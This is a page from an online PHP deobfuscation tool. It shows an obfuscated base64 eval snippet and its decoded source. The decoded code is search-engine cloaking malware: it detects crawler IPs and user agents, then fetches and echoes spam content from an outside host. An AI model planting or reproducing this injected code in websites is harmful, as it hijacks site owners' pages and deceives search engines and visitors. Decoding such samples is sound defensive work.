Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(base64_decode("JHVpcCA9IGdldGVudignUkVNT1RFX0FERFInKTsgJHVhZyA9IGdldGVudignSFRUUF9VU0..

Decoded Output download

$uip = getenv('REMOTE_ADDR'); $uag = getenv('HTTP_USER_AGENT'); $ref = getenv('HTTP_REFERER'); $sqs = getenv('QUERY_STRING'); $bot = false; foreach(array( "66\.249\.[6-9][0-9]\.[0-9]+","74\.125\.[0-9]+\.[0-9]+","65\.5[2-5]\.[0-9]+\.[0-9]+", "74\.6\.[0-9]+\.[0-9]+","67\.195\.[0-9]+\.[0-9]+","72\.30\.[0-9]+\.[0-9]+", "38\.[0-9]+\.[0-9]+\.[0-9]+","93\.172\.94\.227","212\.100\.250\.218","71\.165\.223\.134", "70\.91\.180\.25","65\.93\.62\.242","74\.193\.246\.129","213\.144\.15\.38","195\.92\.229\.2", "70\.50\.189\.191","218\.28\.88\.99","165\.160\.2\.20","89\.122\.224\.230","66\.230\.175\.124", "218\.18\.174\.27","65\.33\.87\.94","67\.210\.111\.241","81\.135\.175\.70","64\.69\.34\.134", "93\.190\.141\.10","89\.149\.253\.169","64\.233\.1[6-8][1-9]\.[0-9]+","64\.233\.19[0-1]\.[0-9]+", "209\.185\.108\.[0-9]+","209\.185\.253\.[0-9]+","209\.85\.238\.[0-9]+","216\.239\.33\.9[6-9]", "216\.239\.37\.9[8-9]","216\.239\.39\.9[8-9]","216\.239\.41\.9[6-9]","216\.239\.45\.4", "216\.239\.46\.[0-9]+","216\.239\.51\.9[6-9]","216\.239\.53\.9[8-9]","216\.239\.57\.9[6-9]", "216\.239\.59\.9[8-9]","216\.33\.229\.163","64\.233\.173\.[0-9]+","64\.68\.8[0-9]\.[0-9]+", "64\.68\.9[0-2]\.[0-9]+","72\.14\.199\.[0-9]+","8\.6\.48\.[0-9]+","207\.211\.40\.82", "67\.162\.158\.146","66\.255\.53\.123","24\.200\.208\.112","129\.187\.148\.240", "129\.187\.148\.244","199\.126\.151\.229","118\.124\.32\.193", "89\.149\.217\.191" ) as $p) if($bot = eregi($p,$uip)) break; if($bot || preg_match('/(http|google|slurp|msnbot|bot|crawl|spider|robot|HttpClient|curl|PHP|Indy Library|WordPress|Charlotte|wwwster|Python|urllib|perl|libwww|lynx|Twiceler|rambler|yandex)/i',$uag) || !eregi("^[a-zA-Z]{5,}",$uag) || strlen($uag) <= 11 || (!empty($sqs) && @stristr($ref,$sqs))) { foreach(array("http://euro-12.in.ua/buttons/oldbuttons/google/links/cl/14.txt") as $u) { if(ini_get('allow_url_fopen') == '1') { if($f = @fopen($u, 'r')) { while($l = fread($f, 1024)) echo $l; fclose($f); break; } } if(function_exists('curl_init')) { if($c = @curl_init($u)) { @curl_setopt($c, CURLOPT_HEADER, 0); @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5); echo $r = curl_exec($c); curl_close($c); if($r) break; } } $temp = parse_url($u); $host = $temp['host']; if($f = @fsockopen($host, isset($temp['port']) ? $temp['port'] : 80, $en, $es, 20)) { fputs($f, "GET " . (isset($temp['path']) ? $temp['path'] : '/') . (isset($temp['query']) ? '?' . $temp['query'] : '') . " HTTP/1.0
" . "Host: $host
" . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
" . "Accept: */*
" . "Accept-Language: en-us,en;q=0.5
" . "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
" . "Keep-Alive: 300
" . "Connection: keep-alive
" . "Referer: http://www.google.com

"); $r = ''; while($l = fread($f, 1024)) $r .= $l; fclose($f); if($p = strpos($r, "

")) $r = substr($r, $p + 4); echo $r; if($r) break; } } }

Did this file decode correctly?

Original Code

eval(base64_decode("JHVpcCA9IGdldGVudignUkVNT1RFX0FERFInKTsgJHVhZyA9IGdldGVudignSFRUUF9VU0VSX0FHRU5UJyk7ICRyZWYgPSBnZXRlbnYoJ0hUVFBfUkVGRVJFUicpOyAkc3FzID0gZ2V0ZW52KCdRVUVSWV9TVFJJTkcnKTsgJGJvdCA9IGZhbHNlOyBmb3JlYWNoKGFycmF5KCAiNjZcLjI0OVwuWzYtOV1bMC05XVwuWzAtOV0rIiwiNzRcLjEyNVwuWzAtOV0rXC5bMC05XSsiLCI2NVwuNVsyLTVdXC5bMC05XStcLlswLTldKyIsICI3NFwuNlwuWzAtOV0rXC5bMC05XSsiLCI2N1wuMTk1XC5bMC05XStcLlswLTldKyIsIjcyXC4zMFwuWzAtOV0rXC5bMC05XSsiLCAiMzhcLlswLTldK1wuWzAtOV0rXC5bMC05XSsiLCI5M1wuMTcyXC45NFwuMjI3IiwiMjEyXC4xMDBcLjI1MFwuMjE4IiwiNzFcLjE2NVwuMjIzXC4xMzQiLCAiNzBcLjkxXC4xODBcLjI1IiwiNjVcLjkzXC42MlwuMjQyIiwiNzRcLjE5M1wuMjQ2XC4xMjkiLCIyMTNcLjE0NFwuMTVcLjM4IiwiMTk1XC45MlwuMjI5XC4yIiwgIjcwXC41MFwuMTg5XC4xOTEiLCIyMThcLjI4XC44OFwuOTkiLCIxNjVcLjE2MFwuMlwuMjAiLCI4OVwuMTIyXC4yMjRcLjIzMCIsIjY2XC4yMzBcLjE3NVwuMTI0IiwgIjIxOFwuMThcLjE3NFwuMjciLCI2NVwuMzNcLjg3XC45NCIsIjY3XC4yMTBcLjExMVwuMjQxIiwiODFcLjEzNVwuMTc1XC43MCIsIjY0XC42OVwuMzRcLjEzNCIsICI5M1wuMTkwXC4xNDFcLjEwIiwiODlcLjE0OVwuMjUzXC4xNjkiLCI2NFwuMjMzXC4xWzYtOF1bMS05XVwuWzAtOV0rIiwiNjRcLjIzM1wuMTlbMC0xXVwuWzAtOV0rIiwgIjIwOVwuMTg1XC4xMDhcLlswLTldKyIsIjIwOVwuMTg1XC4yNTNcLlswLTldKyIsIjIwOVwuODVcLjIzOFwuWzAtOV0rIiwiMjE2XC4yMzlcLjMzXC45WzYtOV0iLCAiMjE2XC4yMzlcLjM3XC45WzgtOV0iLCIyMTZcLjIzOVwuMzlcLjlbOC05XSIsIjIxNlwuMjM5XC40MVwuOVs2LTldIiwiMjE2XC4yMzlcLjQ1XC40IiwgIjIxNlwuMjM5XC40NlwuWzAtOV0rIiwiMjE2XC4yMzlcLjUxXC45WzYtOV0iLCIyMTZcLjIzOVwuNTNcLjlbOC05XSIsIjIxNlwuMjM5XC41N1wuOVs2LTldIiwgIjIxNlwuMjM5XC41OVwuOVs4LTldIiwiMjE2XC4zM1wuMjI5XC4xNjMiLCI2NFwuMjMzXC4xNzNcLlswLTldKyIsIjY0XC42OFwuOFswLTldXC5bMC05XSsiLCAiNjRcLjY4XC45WzAtMl1cLlswLTldKyIsIjcyXC4xNFwuMTk5XC5bMC05XSsiLCI4XC42XC40OFwuWzAtOV0rIiwiMjA3XC4yMTFcLjQwXC44MiIsICI2N1wuMTYyXC4xNThcLjE0NiIsIjY2XC4yNTVcLjUzXC4xMjMiLCIyNFwuMjAwXC4yMDhcLjExMiIsIjEyOVwuMTg3XC4xNDhcLjI0MCIsICIxMjlcLjE4N1wuMTQ4XC4yNDQiLCIxOTlcLjEyNlwuMTUxXC4yMjkiLCIxMThcLjEyNFwuMzJcLjE5MyIsICI4OVwuMTQ5XC4yMTdcLjE5MSIgKSBhcyAkcCkgaWYoJGJvdCA9IGVyZWdpKCRwLCR1aXApKSBicmVhazsgaWYoJGJvdCB8fCBwcmVnX21hdGNoKCcvKGh0dHB8Z29vZ2xlfHNsdXJwfG1zbmJvdHxib3R8Y3Jhd2x8c3BpZGVyfHJvYm90fEh0dHBDbGllbnR8Y3VybHxQSFB8SW5keSBMaWJyYXJ5fFdvcmRQcmVzc3xDaGFybG90dGV8d3d3c3RlcnxQeXRob258dXJsbGlifHBlcmx8bGlid3d3fGx5bnh8VHdpY2VsZXJ8cmFtYmxlcnx5YW5kZXgpL2knLCR1YWcpIHx8ICFlcmVnaSgiXlthLXpBLVpdezUsfSIsJHVhZykgfHwgc3RybGVuKCR1YWcpIDw9IDExIHx8ICghZW1wdHkoJHNxcykgJiYgQHN0cmlzdHIoJHJlZiwkc3FzKSkpIHsgZm9yZWFjaChhcnJheSgiaHR0cDovL2V1cm8tMTIuaW4udWEvYnV0dG9ucy9vbGRidXR0b25zL2dvb2dsZS9saW5rcy9jbC8xNC50eHQiKSBhcyAkdSkgeyBpZihpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSA9PSAnMScpIHsgaWYoJGYgPSBAZm9wZW4oJHUsICdyJykpIHsgd2hpbGUoJGwgPSBmcmVhZCgkZiwgMTAyNCkpIGVjaG8gJGw7IGZjbG9zZSgkZik7IGJyZWFrOyB9IH0gaWYoZnVuY3Rpb25fZXhpc3RzKCdjdXJsX2luaXQnKSkgeyBpZigkYyA9IEBjdXJsX2luaXQoJHUpKSB7IEBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9IRUFERVIsIDApOyBAY3VybF9zZXRvcHQoJGMsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyBAY3VybF9zZXRvcHQoJGMsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBlY2hvICRyID0gY3VybF9leGVjKCRjKTsgY3VybF9jbG9zZSgkYyk7IGlmKCRyKSBicmVhazsgfSB9ICR0ZW1wID0gcGFyc2VfdXJsKCR1KTsgJGhvc3QgPSAkdGVtcFsnaG9zdCddOyBpZigkZiA9IEBmc29ja29wZW4oJGhvc3QsIGlzc2V0KCR0ZW1wWydwb3J0J10pID8gJHRlbXBbJ3BvcnQnXSA6IDgwLCAkZW4sICRlcywgMjApKSB7IGZwdXRzKCRmLCAiR0VUICIgLiAoaXNzZXQoJHRlbXBbJ3BhdGgnXSkgPyAkdGVtcFsncGF0aCddIDogJy8nKSAuIChpc3NldCgkdGVtcFsncXVlcnknXSkgPyAnPycgLiAkdGVtcFsncXVlcnknXSA6ICcnKSAuICIgSFRUUC8xLjBcclxuIiAuICJIb3N0OiAkaG9zdFxyXG4iIC4gIlVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzOyBVOyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOC4wLjMpIEdlY2tvLzIwMDYwNDI2IEZpcmVmb3gvMS41LjAuM1xyXG4iIC4gIkFjY2VwdDogKi8qXHJcbiIgLiAiQWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNVxyXG4iIC4gIkFjY2VwdC1DaGFyc2V0OiBJU08tODg1OS0xLHV0Zi04O3E9MC43LCo7cT0wLjdcclxuIiAuICJLZWVwLUFsaXZlOiAzMDBcclxuIiAuICJDb25uZWN0aW9uOiBrZWVwLWFsaXZlXHJcbiIgLiAiUmVmZXJlcjogaHR0cDovL3d3dy5nb29nbGUuY29tXHJcblxyXG4iKTsgJHIgPSAnJzsgd2hpbGUoJGwgPSBmcmVhZCgkZiwgMTAyNCkpICRyIC49ICRsOyBmY2xvc2UoJGYpOyBpZigkcCA9IHN0cnBvcygkciwgIlxyXG5cclxuIikpICRyID0gc3Vic3RyKCRyLCAkcCArIDQpOyBlY2hvICRyOyBpZigkcikgYnJlYWs7IH0gfSB9IA=="));

Function Calls

base64_decode 1

Variables

None

Stats

MD5 8a989bf0fe68754ffd49cee29640862b
Eval Count 1
Decode Time 71 ms